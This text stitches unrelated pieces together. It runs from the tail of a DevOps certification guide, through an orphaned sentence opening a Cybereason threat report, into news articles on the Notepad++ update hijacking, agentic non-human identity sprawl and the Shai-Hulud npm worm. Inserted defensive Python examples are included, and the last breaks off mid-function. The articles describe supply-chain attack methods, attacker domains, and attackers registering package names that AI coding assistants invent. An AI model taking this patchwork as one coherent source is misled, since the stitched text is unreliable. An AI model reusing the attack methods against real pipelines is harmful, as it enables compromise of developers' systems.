- Cloud Migration and Optimization: Moving applications to the cloud and optimizing infrastructure for cost-effectiveness and scalability.
- Monitoring and Metrics Implementation: Implementing monitoring tools such as Prometheus and Grafana to ensure system reliability and performance.
Preparation Plan: How to Get Certified?
7–14 Days Preparation Plan:
- Day 1–3: Understand the fundamentals of DevOps principles, CI/CD, and cloud technologies.
- Day 4–7: Dive deep into tools like Jenkins, Docker, Kubernetes, and AWS.
- Day 8–10: Study automation, configuration management, and monitoring tools.
- Day 11–14: Practice with real-world projects, set up CI/CD pipelines, and infrastructure automation.
30 Days Preparation Plan:
- Week 1–2: Cover DevOps foundations, CI/CD, and version control systems.
- Week 3: Focus on infrastructure management, including cloud platforms and IaC tools.
- Week 4: Implement real-world DevOps pipelines and gain hands-on practice.
60 Days Preparation Plan:
- Week 1–2: Master the DevOps lifecycle, CI/CD, version control, and monitoring tools.
- Week 3–4: Study automation, IaC, and cloud platforms like AWS, Azure, and GCP.
- Week 5–6: Build end-to-end pipelines, understand security practices, and review common challenges.
Common Mistakes to Avoid
Achieving DevOps certification requires a focused and disciplined approach. Here are some common mistakes to avoid during your preparation:
- Neglecting Hands-On Practice: DevOps is all about practical skills. While theoretical knowledge is essential, you must dedicate time to working with the actual tools and technologies (e.g., Jenkins, Docker, Terraform) to gain hands-on experience.
- Skipping the Fundamentals: DevOps is built on foundational concepts like version control, CI/CD, and automation. Don’t skip over these core topics, as they form the basis for more advanced practices.
- Rushing Through Preparation: DevOps requires a deep understanding of various tools and practices. Take your time to master each topic rather than rushing through them. Continuous learning and hands-on practice will yield the best results.
- Ignoring Cloud Platforms: Cloud technologies, such as AWS, Azure, and Google Cloud, play a significant role in DevOps. Make sure you familiarize yourself with at least one cloud platform to ensure a comprehensive understanding of DevOps practices.
- Overlooking Security Practices (DevSecOps): In DevOps, security isn’t an afterthought. Understand and implement DevSecOps practices to ensure the security of the entire pipeline.
Best Next Certification After CDE
After obtaining your Certified DevOps Engineer (CDE) certification, it’s important to continue growing your skills and expand into new areas of expertise. Here are some top options for your next certification:
Same Track: Certified DevSecOps Professional
After becoming a CDE, a natural progression would be to dive into DevSecOps. This certification focuses on integrating security practices into the DevOps pipeline, ensuring that security is an integral part of the software development lifecycle.
Cross-Track: Certified Kubernetes Administrator (CKA)
Kubernetes is a key tool in modern DevOps environments for orchestrating containerized applications. The CKA will enhance your skills in managing and deploying applications using Kubernetes.
Leadership: Certified DevOps Leader (DOL)
For those looking to take on leadership roles, the Certified DevOps Leader certification focuses on the strategic aspects of DevOps, helping you lead teams and manage large-scale DevOps transformations.
Choose Your Path: 8 Learning Paths
After achieving the Certified DevOps Engineer certification, you can explore specialized learning paths depending on your career aspirations. Here are 8 potential learning tracks you can pursue:
- DevOps: Deepen your expertise in automation, cloud platforms, CI/CD, and version control systems.
- DevSecOps: Specialize in securing DevOps pipelines by integrating security practices and tools (e.g., static code analysis, security testing).
- SRE (Site Reliability Engineering): Focus on system reliability, scalability, and automation of operational tasks for highly available systems.
- AIOps/MLOps: Learn how to incorporate AI and machine learning into the DevOps workflow, automating decision-making and monitoring tasks.
- DataOps: Specialize in managing and automating data workflows within a DevOps environment, enabling faster and more reliable data-driven decision-making.
- FinOps: Gain expertise in cloud financial management, helping organizations optimize their cloud spending while maintaining operational efficiency.
- Cloud Engineering: Develop a strong focus on cloud technologies (AWS, Azure, Google Cloud), infrastructure management, and cloud-native application development.
- Platform Engineering: Learn to build and maintain the underlying platforms and services that enable DevOps practices at scale across various environments.
Role → Recommended Certifications
- DevOps Engineer → Certified DevOps Engineer
- SRE → Certified Site Reliability Engineer
- Platform Engineer → Certified DevOps Engineer
- Cloud Engineer → AWS Certified Solutions Architect
- Security Engineer → Certified DevSecOps Professional
- Data Engineer → Data Engineering with Google Cloud
- FinOps Practitioner → FinOps Certified Practitioner
- Engineering Manager → Certified DevOps Engineer, Certified ScrumMaster
Top Institutions Offering Training and Certification for CDE
Several institutions offer training and certification for Certified DevOps Engineer (CDE), providing valuable learning resources and practical experience. Some of the top providers include:
- DevOpsSchool: DevOpsSchool is a leading provider of DevOps training with comprehensive courses and hands-on labs, backed by real-world projects and instructor-led sessions.
- Cotocus: Known for providing expert-led, real-time project-based training, Cotocus offers specialized courses in DevOps, focusing on automation and continuous delivery.
- Scmgalaxy: A trusted name in the DevOps training space, Scmgalaxy offers courses that cover all DevOps principles, tools, and practices, ensuring you are industry-ready.
- BestDevOps: Offers a wide range of DevOps training programs with hands-on learning experiences in CI/CD, cloud platforms, and automation.
- DevSecOpsSchool: A specialized provider offering DevSecOps training for professionals who want to integrate security into the DevOps lifecycle.
- SRESchool: Offers comprehensive SRE-focused DevOps training with a focus on system reliability, automation, and scaling.
- AIOpsSchool: Offers specialized training in AI and machine learning operations for professionals looking to integrate AI into their DevOps practices.
- DataOpsSchool: Focuses on the intersection of DevOps and data, helping engineers manage and automate data pipelines.
- FinOpsSchool: Provides training on managing cloud financials and optimizing cloud spending in DevOps environments.
FAQs (Frequently Asked Questions)
1. How difficult is the Certified DevOps Engineer certification?
The exam is challenging, requiring in-depth knowledge and practical experience in DevOps tools and methodologies.
2. How much time should I spend preparing for the certification?
Typically, it takes about 30 to 60 days of consistent preparation to pass the exam.
3. Are there any prerequisites for taking the CDE exam?
There are no formal prerequisites, but a basic understanding of software development and IT operations will help.
4. Should I take the CDE certification exam before or after completing other certifications?
It’s best to take the CDE certification after gaining foundational knowledge in areas like CI/CD, cloud platforms, and version control.
5. What’s the career value of obtaining the Certified DevOps Engineer certification?
It significantly enhances your career by validating your expertise in DevOps, making you eligible for senior roles in the field.
6. What tools should I focus on during preparation?
Focus on tools like Jenkins, Docker, Kubernetes, Terraform, AWS, Git, and Ansible.
7. How do I structure my learning path for DevOps?
Start with DevOps basics, then dive into CI/CD, automation, and cloud tools before focusing on security and monitoring.
8. Can the CDE certification help in leadership roles?
Yes, it helps if you are aiming for leadership positions, as it demonstrates your expertise in managing complex DevOps projects.
Why This Matters
Becoming a Certified DevOps Engineer is a game-changer in today’s tech-driven world. With organizations increasingly relying on agile methodologies, automation, and continuous delivery to stay competitive, the demand for skilled DevOps professionals is higher than ever. Earning the CDE certification not only enhances your technical skills but also positions you as a leader in the field of software development and operations.
As a certified DevOps engineer, you will have the knowledge and skills to implement best practices, manage complex systems, and drive automation across your organization. Whether you’re aiming to deepen your technical expertise or expand into specialized tracks like DevSecOps, SRE, or AIOps, the CDE certification is the first step in an exciting and rewarding career journey.
In this Threat Analysis report, Cybereason Security Services investigates a fake installer attack we recently observed multiple times. We identified some findings that have not been documented in previous reports and obtained new threat intelligence insights from the malware samples.
The attack, which ran from June through December 2025, involved infrastructure-level compromise of Notepad++’s shared hosting provider that enabled threat actors to selectively intercept and redirect update traffic to servers under their control, Notepad++ author Don Ho said in the statement.
“Multiple independent security researchers have assessed that the threat actor is likely a Chinese state-sponsored group, which would explain the highly selective targeting observed during the campaign,” Ho wrote.
The incident highlights a critical blind spot in enterprise security. Attackers prize distribution points like update servers because one successful insertion delivers access to thousands of environments at once, according to a Forrester analysis also published Sunday.
The compromise is particularly concerning because Notepad++ is widely used by developers, analysts, and IT operators, yet “does not require an enterprise contract or license, and does not include usage tracking by default and therefore may not be tracked in an enterprise software inventory,” Forrester analysts Jeff Pollard, Allie Mellen, Jess Burn, Janet Worthington, and Tope Olufon wrote in their blog post.
How the attack unfolded
The compromise occurred at the hosting provider level rather than through vulnerabilities in Notepad++ code, Ho said in the note. Attackers gained access to the shared hosting server and redirected traffic from the update endpoint to attacker-controlled servers.
“The bad actors specifically searched for the Notepad++ domain to intercept the traffic to your website, as they might know the then-existing Notepad++ vulnerabilities related to insufficient update verification controls,” the hosting provider said in a statement shared by Ho.
The name of the hosting provider, however, is not disclosed in the blog post. A detailed query seeking comments from Ho remains unanswered.
The initial server compromise lasted until September 2, 2025, when scheduled maintenance included kernel and firmware updates. Attackers nonetheless retained stolen credentials for internal services until December 2, 2025, allowing traffic interception to continue, according to the provider’s statement. The targeting was highly selective — traffic from certain users was redirected while most legitimate updates proceeded normally, Ho said.
Rapid7 identifies custom malware
Cybersecurity firm Rapid7 also published a detailed technical analysis corroborating Ho’s disclosure and identifying the attack as part of a broader campaign deploying previously undocumented malware. Rapid7’s investigation uncovered a custom backdoor the firm dubbed “Chrysalis,” alongside Cobalt Strike and Metasploit frameworks.
“Forensic analysis conducted by the MDR team suggests that the initial access vector aligns with publicly disclosed abuse of the Notepad++ distribution infrastructure,” Rapid7 researcher Ivan Feigl wrote. The Chrysalis backdoor supports 16 distinct command capabilities ranging from interactive shell access to complete self-removal. One loader variant exploited Microsoft Warbird, an internal code protection framework, to execute shellcode while masquerading as a legitimate Microsoft-signed binary.
Rapid7 attributed the campaign to Lotus Blossom, also known as Billbug, a Chinese APT group active since 2009, known for espionage operations targeting government, telecommunications, and critical infrastructure sectors across Southeast Asia and Central America. The attribution is based on strong similarities to previously published Symantec research, particularly the use of a renamed Bitdefender executable to side-load malicious DLLs.
Why detection proved difficult
The sophisticated malware evaded detection for months largely because a compromised utility blends into normal developer behavior, making it challenging to identify. “Most EDR programs are blind by design to ‘expected’ developer behavior,” the Forrester analysts wrote. “A compromised utility does not need exploits, LOLBins, or exotic malware. It just needs to look boring—like something a dev would do.”
Ho noted that his incident response team was unable to extract concrete indicators of compromise despite analyzing roughly 400 GB of server logs. In an edit posted Sunday, Ho acknowledged Rapid7’s more detailed findings. “Last evening I received an email from Ivan Feigl (Rapid7) to share their excellent investigation story—it seems to be the same story, and obviously, they have more tangible information (including IoCs) than I do,” he wrote.
Rapid7 identified network infrastructure, including IP addresses in Malaysia and China, along with command and control URLs, including api.skycloudcenter.com and api.wiresguard.com.
Security enhancements and broader implications
In response, Notepad++ has migrated to a new hosting provider and enhanced WinGup (the updater component) in version 8.8.9 to verify both certificate and signature of downloaded installers, Ho said. Certificate and signature verification will be enforced starting with version 8.9.2, expected within approximately one month.
“I deeply apologize to all users affected by this hijacking,” Ho wrote. “I recommend downloading v8.9.1 and running the installer to update your Notepad++ manually.”
For enterprise security teams, the incident underscores the need for comprehensive software inventories that include widely used utilities, cryptographic verification of all updates, and what Forrester described as a “shift from implicit trust to continuous verification.” The Forrester analysts also warned that AI agents could amplify similar risks. “The same supply chain blind spots that let a compromised tool blend into developer noise will let a compromised agent establish persistence and elevate privileges at scale,” they wrote. Organizations that cannot strictly define what should execute and communicate are “structurally conceding this class of attack.”
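The inventory and update-verification points above, as an added Python example that is neither Notepad++'s updater code nor Forrester's: it audits a constructed CSV inventory export (host,product,version rows; the host names and the 8.10.0 build are made up) against the 8.9.1 version the maintainer recommends and the 8.9.2 version from which signature checks are enforced, and it shows a digest comparison of a downloaded installer against a value obtained out of band, which is a simplified stand-in for the certificate and signature verification described in the article.

```python
"""Inventory audit for a utility that is not license-tracked: flag hosts whose
Notepad++ build is below the version the maintainer recommends. Added example;
inventory rows and host names are constructed, not data from the incident."""
import hashlib
import hmac
import re

RECOMMENDED = "8.9.1"      # version the maintainer asked users to install manually
ENFORCED_VERIFY = "8.9.2"  # version from which certificate/signature checks are enforced


def parse_version(text):
    """'v8.9.1' -> (8, 9, 1). Tuples compare numerically, so 8.10.0 > 8.9.1;
    a plain string compare would wrongly treat '8.10.0' as older than '8.9.1'."""
    m = re.fullmatch(r"v?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def _key(v):
    """Pad to three components so (8, 9) and (8, 9, 0) compare equal."""
    return v + (0,) * (3 - len(v))


def classify(version):
    v = _key(parse_version(version))
    if v < _key(parse_version(RECOMMENDED)):
        return "update-required"
    if v < _key(parse_version(ENFORCED_VERIFY)):
        return "current"
    return "current-verification-enforced"


def audit_inventory(csv_text):
    """Parse 'host,product,version' rows and return a sorted list of
    (host, version, status) for every Notepad++ install that needs updating."""
    findings = []
    for line in csv_text.strip().splitlines():
        host, product, version = (f.strip() for f in line.split(","))
        if product.lower() != "notepad++":
            continue
        status = classify(version)
        if status == "update-required":
            findings.append((host, version, status))
    return sorted(findings)


def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()


def installer_matches(blob, expected_sha256_hex):
    """Compare a downloaded installer against a digest obtained out of band
    (e.g. from a signed release manifest), using a constant-time comparison."""
    return hmac.compare_digest(sha256_hex(blob), expected_sha256_hex.lower())


# constructed sample inventory (hosts are made up; 8.10.0 is a hypothetical build)
INVENTORY = """\
dev-ws-01,Notepad++,8.8.9
dev-ws-02,Notepad++,8.9.1
dev-ws-03,Notepad++,v8.10.0
ops-jump-01,Notepad++,8.7.1
ops-jump-02,7-Zip,24.09
"""

if __name__ == "__main__":
    for host, version, status in audit_inventory(INVENTORY):
        print(f"{host}: {version} -> {status}")
```

The version parsing is the part worth keeping: a naive string comparison would report a future 8.10.x build as older than 8.9.1 and leave it flagged forever. For the digest check, the expected value has to come from somewhere the hijacked update path could not influence, which is exactly why the maintainer moved to verifying a certificate and signature inside the updater rather than trusting whatever the download endpoint returns.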
Agentic use will vary by enterprise, but analysts, consultants, and security vendors agree that their numbers will expand far beyond CISOs’ ability to maintain control as they simultaneously navigate the price of decades of identity governance neglect for non-human identities (NHIs), including service accounts, OAuth tokens, embedded API keys, and automation credentials.
Ishraq Khan, CEO of coding productivity tool vendor Kodezi, sees most enterprises today housing 8 to 10 million such identities, a figure he projects will hit 20 to 50 million by year’s end.
Jason Sabin, CTO at DigiCert, predicts an even steeper rise, with the number of identities enterprises must account for increasing tenfold by January 2027.
“We need to rethink how identity and data provisioning is done and put in place the right processes that can scale with the growth of agentic identities,” says Justin Greis, CEO of consulting firm Acceligence and former head of the North American cybersecurity practice at McKinsey. “You simply cannot apply human processes to something that will scale at this rate.”
Visibility is the bigger problem
As bad as that massively expanding identity universe is, the bigger problem may be how little visibility CISOs have into NHIs, with AI agents offering not just the fastest growth but the least visibility.
Jason Andersen, principal analyst for Moor Insights & Strategy, estimates 25% NHI visibility for enterprise CISOs today. “The remaining 75% is in the shadows,” he adds.
Those shadows include “semi-shadow” activities, such as third parties or lines of business that have been given permission to experiment with agentic AI but have not necessarily alerted IT or security teams about what they are doing.
Still, Andersen sees that number getting a lot worse, projecting visibility to drop to about 12% by year-end and then into the single digits by January 2028. “And then they’ll likely fix it,” he says, adding, “It’s a big frickin’ problem.”
Gartner analysts Jeremy D’Hoinne and Akif Khan agree CISOs face urgent problems in this area today.
NHIs are going to be “several orders of magnitude larger than human identities and most organizations do not have a strong enough foundation to manage both machine and agentic identities,” Gartner’s Khan says.
Enterprise CISOs are “blind to what is happening. The numbers are going to be overwhelming,” D’Hoinne adds.
Forrester expects similar outcomes for CISOs. “There is going to be an explosion of non-human identities,” says Forrester analyst Geoff Cairns. “The exponential growth is indisputable.”
Kodezi’s Khan notes that the lack of a robust base for NHI governance — now including agentic AI — is a critical problem.
“Enterprises never solved non-human authentication so we don’t have the systems in place for a good secure environment. At its core, we never had the right foundation. That means that we will never have that perfect inventory,” he explains.
Cost-effective fix: Do nothing
Kodezi’s Khan offers an interesting fix for that foundational problem: Don’t even try.
He argues it’s a money pit that will never be fully resolved. Instead, he suggests pouring resources into creating a strict identity strategy for every NHI going forward.
“Aim for containment rather than for perfection. You can’t really govern every identity, but if you start now, you can govern future actions,” he says, adding that, over the years, the percentage of uncontrolled identities will slowly drop as millions more identities are added.
Nik Kale, principal engineer at Cisco and member of the Coalition for Secure AI (CoSAI) and ACM’s AI Security (AISec) program committee, agrees with that assessment. “If you are drowning, you don’t start by draining the ocean.”
“The ratios tell you why this is so ungovernable. These identities are growing much faster than the discovery capabilities,” Kale notes. “It becomes a math problem at that point.”
As for the path forward, Kale advises not to try to fix the legacy situation.
“You just have to contain it, segment it, assume it’s compromised and that it’s hostile territory,” he says. “The plan needs to be containment plus a clean slate going forward. Inventory all non-human identities. Identify which have standing versus just-in-time access. Assign ownership to every one of them. No product required — just a terrifying spreadsheet.”
Kale adds that getting governance right from now on delivers the greater benefit for CISOs. “In my opinion, the ratio matters less than the governance gap. Whether it’s 200:1 or 500:1, if IAM [identity access management] only manages 44% of them, the attack surface is already unmanageable,” he says.
But he stresses that NHIs — especially when agentic — can be particularly difficult to find, let alone control.
“Most organizations are undercounting by two to three times because machine identities are scattered across cloud consoles, repos, config files, and secrets managers that nobody’s aggregating,” Kale says. “Agentic AI is a multiplier, not an addition. Agents spawn subagents, create credentials dynamically, and establish agent-to-agent auth chains. One agent deployment can generate dozens of new machine identities.”
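Kale’s “terrifying spreadsheet” is in practice a join across the places he lists. The following is an added example, not code from Kale, Cisco or the article: it merges constructed exports from a cloud IAM console, a repository secret scanner and a secrets manager into one inventory keyed by credential fingerprint, then classifies each identity as standing or just-in-time, owned or ownerless, and active, dormant or without any usage telemetry. The field names, the sample records and the thresholds are assumptions made for the demonstration.

```python
"""Build one inventory of non-human identities (NHIs) from sources that are
normally never joined, then classify each identity: standing vs just-in-time
access, owner known or unknown, still in use or not.

Every record below is constructed sample data; no real keys or accounts.
"""
from __future__ import annotations
from dataclasses import dataclass, field
from datetime import date, datetime

TODAY = date(2026, 3, 2)          # pinned so the report is reproducible
DORMANT_AFTER_DAYS = 90           # unused for longer than this -> dormant
JIT_MAX_TTL_DAYS = 1.0            # credentials that live longer than a day are "standing"

# Source 1: cloud IAM export (constructed). expires=None means the key never expires.
CLOUD_IAM_EXPORT = [
    {"principal": "svc-billing-etl", "key_id": "AKIA0000000000000001", "created": "2023-05-10",
     "expires": None, "last_used": "2026-02-28", "tags": {"owner": "finance-data"}},
    {"principal": "svc-legacy-backup", "key_id": "AKIA0000000000000002", "created": "2021-01-15",
     "expires": None, "last_used": "2024-11-02", "tags": {}},
    {"principal": "agent-ticket-triage", "key_id": "ASIA0000000000000003", "created": "2026-03-02",
     "expires": "2026-03-02T12:00", "last_used": "2026-03-02", "tags": {"owner": "support-ai"}},
]
# Source 2: secret-scanner hits in git history (constructed). The second cloud key
# also shows up here: it is one identity seen twice, not two identities.
REPO_SECRET_SCAN = [
    {"repo": "infra/deploy", "path": "ci/env.prod", "fingerprint": "AKIA0000000000000002"},
    {"repo": "web/frontend", "path": ".npmrc", "fingerprint": "npm_token_7f3a"},
]
# Source 3: secrets-manager listing (constructed). rotation_days is the credential lifetime.
SECRETS_MANAGER = [
    {"name": "prod/github-app-ci", "owner": "platform-eng", "rotation_days": 30,
     "last_accessed": "2026-03-01", "fingerprint": "gh_app_9c1d"},
]


@dataclass
class NHI:
    fingerprint: str
    name: str
    owner: str | None
    ttl_days: float | None        # None = never expires
    last_used: date | None        # None = no usage telemetry at all
    sources: set[str] = field(default_factory=set)

    @property
    def standing(self) -> bool:
        return self.ttl_days is None or self.ttl_days > JIT_MAX_TTL_DAYS

    def findings(self) -> list[str]:
        out = []
        if not self.owner:
            out.append("no-owner")
        if self.standing:
            out.append("standing-access")
        if self.last_used is None:
            out.append("usage-unknown")
        elif (TODAY - self.last_used).days > DORMANT_AFTER_DAYS:
            out.append("dormant")
        if "repo" in self.sources:
            out.append("leaked-in-repo")
        return out


def build_inventory() -> dict[str, NHI]:
    inv: dict[str, NHI] = {}

    def upsert(fp, name, owner, ttl, last_used, source):
        rec = inv.get(fp)
        if rec is None:
            rec = inv[fp] = NHI(fp, name, owner, ttl, last_used)
        else:                                   # merge: keep whatever any source knows
            rec.owner = rec.owner or owner
            rec.last_used = rec.last_used or last_used
            rec.ttl_days = rec.ttl_days if rec.ttl_days is not None else ttl
        rec.sources.add(source)

    for k in CLOUD_IAM_EXPORT:
        created = datetime.fromisoformat(k["created"])
        ttl = None if k["expires"] is None else \
            (datetime.fromisoformat(k["expires"]) - created).total_seconds() / 86400
        upsert(k["key_id"], k["principal"], k["tags"].get("owner"), ttl,
               date.fromisoformat(k["last_used"]), "cloud")
    for hit in REPO_SECRET_SCAN:                # a scanner knows where a secret sits, not who owns it
        upsert(hit["fingerprint"], f"{hit['repo']}:{hit['path']}", None, None, None, "repo")
    for s in SECRETS_MANAGER:
        upsert(s["fingerprint"], s["name"], s["owner"], float(s["rotation_days"]),
               date.fromisoformat(s["last_accessed"]), "secrets-manager")
    return inv


def summarize(inv: dict[str, NHI]) -> dict[str, int]:
    """Counts per finding, plus how many raw records collapsed into how many identities."""
    counts = {"raw_records": len(CLOUD_IAM_EXPORT) + len(REPO_SECRET_SCAN) + len(SECRETS_MANAGER),
              "identities": len(inv)}
    for rec in inv.values():
        for f in rec.findings():
            counts[f] = counts.get(f, 0) + 1
    return counts


if __name__ == "__main__":
    inventory = build_inventory()
    for rec in sorted(inventory.values(), key=lambda r: r.name):
        print(f"{rec.name:28} owner={rec.owner or '-':14} {sorted(rec.sources)} {rec.findings()}")
    print(summarize(inventory))
```

The merge step is the point: six raw records collapse into five identities, and the one key that appears both in the cloud console and in a repository is the worst of them (no owner, never expires, unused for over a year, and sitting in git history). Only the short-lived agent credential comes out clean, which is what a just-in-time design looks like in the inventory.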
Sanchit Vir Gogia, chief analyst at Greyhound Research, sees a reckoning ahead.
“The enterprise control plane has quietly shifted from humans to machines, while governance stayed behind,” he says. “Once nonhuman identities outnumber humans by hundreds to one, identity stops being an administrative discipline and becomes the operating system of trust. The failure mode is not that there are too many identities; it is that enterprises cannot assert intent, ownership, and accountability for what those identities are doing at runtime.”
Moreover, the situation is intensifying thanks to today’s business environment.
“This is compounded by incentive structures that reward speed and uptime while penalizing breakage, which leads teams to overpermission machines by default,” Gogia says. “Overpermission is invisible until it is catastrophic. At that point, audits, roles, and reviews offer comfort but not control.”
Agentic didn’t start the fire
None of this situation was caused by agentic AI, Gogia underscores.
“Enterprises did not enter a machine identity crisis because of agentic AI. They entered it years ago through service accounts, embedded API keys, long lived tokens, and automation credentials that were created to keep systems moving and then quietly forgotten,” he says. “What agents change is velocity and reach. They inherit trust and then operationalize it at machine speed. A legacy identity that once represented a contained risk now becomes an execution layer across systems, vendors, and workflows.”
Gogia adds: “The most dangerous assumption in enterprise security today is that valid identity implies safe behavior. In machine-driven environments, credentials are often correct and activity is authorized, yet outcomes are harmful. Machines do not follow joiner-mover-leaver models. They do not pause for approvals. They operate continuously and propagate actions automatically.”
As a result, decision-making agents, layered into operations, achieve a rate of action that “collapses the window for detection,” he says. “The failure shifts from prevention to detection lag. By the time humans understand what happened, the agent already did it.”
This should — and likely will — cause a rethinking from both enterprise CISOs and CIOs, he says.
“This moment tests leadership alignment. CIOs are under pressure to deploy agents for productivity and scale. CISOs are staring at accountability gaps, forensic complexity, and cascading blast radius. If these agendas diverge, the enterprise ends up with autonomy without responsibility. Boards will ask who owns an agent, who sets its boundaries, and who answers when it causes harm,” Gogia explains.
“The next phase of governance will require responsibility mapping for agents, separation of duties for high impact actions, and clear human checkpoints where judgment truly matters,” he adds. “Incident response must also evolve toward reconstructing chains of machine decisions, not just tracing logins.”
These risks include, for example, React2Shell, Shai-Hulud, and XZ Utils: software supply chain incidents that started small and later had massive repercussions. Shai-Hulud stands out in particular, signaling the end of the “passive era” of supply chain attacks and the beginning of the “active worm” era, a shift with devastating consequences for software pipelines.
Traditionally, supply chain attacks were passive traps. An attacker would upload a misspelled package (typosquatting), such as “reqeusts” instead of “requests,” sit back, and wait for a careless developer to make a mistake. The blast radius grew linearly and rather slowly.
Shai-Hulud changed the rules of the game by introducing worm-like propagation. Once it lands on a developer’s machine, it actively collects credentials (NPM tokens, GitHub secrets) and uses them to automatically publish infected versions of other legitimate packages maintained by the victim. Unlike spyware, which aims to remain hidden, variants of Shai-Hulud include a “dead man’s switch”: if the malware detects that it is being blocked or analyzed, it attempts to wipe the victim’s system, erasing all traces of itself.
The target is no longer just the application but the developer’s identity and the automated CI/CD pipelines that implicitly trust it. What if the next iteration of Shai-Hulud targeted other language ecosystems?
Programming languages as ticking time bombs
Python, the language of AI and data science, is one example. The next evolutionary stage of the supply chain worm will likely not only steal AWS keys but also exploit the rise of AI coding assistants.
Security researchers are already observing “hallucination hijacking,” in which attackers register packages that AI tools invent and recommend although they never existed. A worm like Shai-Hulud could infect a data scientist’s laptop, scan their local LLM chat history for private package names, and automatically register malicious versions of them publicly. A worm in this ecosystem would not merely take down a website; it could subtly poison financial models, alter medical research data, or insert backdoors into corporate AI training sets, damage that could go undetected for years.
The Java/JVM and Rust/Go ecosystems are further candidates; there too, the effects would be catastrophic.
The polyglot supply chain attack
The most frightening prospect, however, is the convergence of these threats in a polyglot supply chain attack. Currently, security teams operate in isolation. AppSec monitors the code, CloudSec monitors the cloud, NetworkSec monitors the perimeter. A polyglot attack is designed to seamlessly break through these silos.
This happens as follows: A worm infiltrates a frontend developer’s laptop via a low-level JavaScript dependency. It detects that the developer also has access to the company’s backend Rust repository, steals these credentials, and injects malicious build scripts into the Rust CI pipeline. The Rust pipeline then deploys a compromised binary to a Kubernetes cluster.
The attack could begin in NPM but end as a compiled binary backdoor in the production cloud infrastructure. The JavaScript security team won’t detect it because it immediately left their domain. The cloud security team would also miss the threat because it was delivered from a trusted CI pipeline using valid credentials. CISOs need to be aware of this and take appropriate precautions.
Recommendations for CISOs
The EU Cyber Resilience Act (CRA) gives CISOs a useful frame of reference. It obliges manufacturers, importers, and distributors to protect products with digital elements, pushing them to invest in secure design during development and maintenance. Its requirements must be implemented in stages by the end of 2027 and cover the security of connected hardware and software, including the handling of vulnerabilities and their disclosure or notification to the relevant authorities. Manufacturers must also document the components of their software in software bills of materials (SBOMs).
The NIS2 Directive, which has now entered into force, imposes comparable product and supplier requirements on operators of critical infrastructure (KRITIS); in Germany it is transposed through the NIS2 Implementation Act (NIS2UmsuCG) alongside the KRITIS Umbrella Act (KRITIS-Dachgesetz). OpenKRITIS provides a worthwhile overview.
To protect themselves from Shai-Hulud and similar threats, CISOs and their teams should implement the following steps:
End the “implicit trust” in identities. In the Shai-Hulud scenarios described earlier, the problem was that CI/CD systems were too often trusted blindly. CISOs should therefore ensure their teams critically examine their pipeline security.
CI/CD systems must not assume an activity is legitimate simply because it was authenticated with a valid developer token. Instead, they must prioritize identity protection. Attackers have already been observed specifically stealing credentials such as NPM tokens and GitHub secrets in order to publish infected packages automatically. Protecting these identities must therefore be given top priority.
Security silos should be broken down. Many security aspects still aren’t consolidated under a single, overarching management structure. Tools and departments dedicated to application security, infrastructure security, cloud security, network security, and many others create numerous islands within the vast sea of security strategy. They all need to collaborate more closely and be coordinated by the CISO.
A key risk is the previously described polyglot supply chain attack, which seamlessly transcends these silos. Therefore, CISOs must implement cross-departmental and cross-functional monitoring. To further illustrate the danger: An attack could begin with a JavaScript file, propagate through build scripts, and ultimately result in a backdoor in the cloud. Often, there’s no integrated visibility to track this entire process. The JavaScript team might lose sight of the attack once it leaves its sphere, while the cloud team relies on the CI pipeline.
CISOs must therefore establish systems that monitor the entire path from software development to build and all the way to runtime. SBOMs, which document all software used, provide a solution.
Prepare for active worms and protect AI tools. To mitigate AI-driven risks, it is crucial to prevent the hijacking and manipulation of AI coding tools, which many developers now rely on to write their software. Security researchers are already observing attackers registering the non-existent packages that AI tools hallucinate.
Active worms represent the next level of threat, so security strategies must extend beyond guarding against typosquatting. Threats like Shai-Hulud spread exponentially, as worms do, and at that speed manual package review is no longer sufficient.
This type of supply chain worm also features a “dead man’s switch” that wipes the victim’s system if it detects analysis. CISOs should ensure that logs are shipped off the developer’s machine so that traces of the attack survive for forensic investigation.
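One way to act on the two points above, that a valid token is not a sufficient trust signal and that worm-speed propagation outruns manual review, is a policy check over the registry’s publish events before a pipeline consumes a new release. The following is an added example, not code from the original article or from any registry or project; it assumes a publish log with the fields shown (maintainer, package, version, an `auth` field that distinguishes a short-lived OIDC trusted-publishing identity from a long-lived token, and the source commit recorded for the release), a list of reviewed commits per package, and constructed sample events.

```python
"""Policy check over registry publish events: a valid maintainer token is not,
by itself, evidence that a release is legitimate. Constructed sample events.

Flags three things the worm scenario in the text produces:
  - a release authenticated with a long-lived token rather than a
    workflow-bound OIDC identity ("trusted publishing"),
  - a release whose source commit never went through review/CI,
  - one maintainer pushing many distinct packages within minutes
    (propagation through every package the stolen credential can reach).
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

BURST_WINDOW = timedelta(minutes=30)   # assumed: 3+ distinct packages from one
BURST_DISTINCT_PACKAGES = 3            # identity inside 30 minutes is a burst

# Constructed publish log. "oidc" = trusted publishing from a CI workflow,
# "token" = classic long-lived maintainer token. "commit" = recorded source commit.
PUBLISH_EVENTS = [
    {"ts": "2026-03-02T09:00:00", "package": "acme-ui-kit", "version": "4.2.1",
     "maintainer": "dev-alice", "auth": "oidc", "commit": "c1"},
    {"ts": "2026-03-02T13:02:00", "package": "acme-ui-kit", "version": "4.2.2",
     "maintainer": "dev-alice", "auth": "token", "commit": "zz"},
    {"ts": "2026-03-02T13:03:00", "package": "acme-date-fmt", "version": "1.9.0",
     "maintainer": "dev-alice", "auth": "token", "commit": "zz"},
    {"ts": "2026-03-02T13:04:00", "package": "acme-log-shim", "version": "0.5.3",
     "maintainer": "dev-alice", "auth": "token", "commit": "zz"},
    {"ts": "2026-03-02T15:00:00", "package": "acme-cli", "version": "2.0.0",
     "maintainer": "dev-bob", "auth": "oidc", "commit": "b7"},
]
# Constructed: commits that went through code review and a CI build, per package.
REVIEWED_COMMITS = {
    "acme-ui-kit": {"c1"}, "acme-cli": {"b7"}, "acme-date-fmt": set(), "acme-log-shim": set(),
}


def evaluate(events, reviewed) -> dict[tuple[str, str], list[str]]:
    """Return {(package, version): [reasons]} for every release that fails policy."""
    findings: dict[tuple[str, str], list[str]] = defaultdict(list)
    by_maintainer: dict[str, list] = defaultdict(list)

    for e in events:
        key = (e["package"], e["version"])
        if e["auth"] != "oidc":                       # valid token, but not a workflow identity
            findings[key].append("long-lived-token")
        if e["commit"] not in reviewed.get(e["package"], set()):
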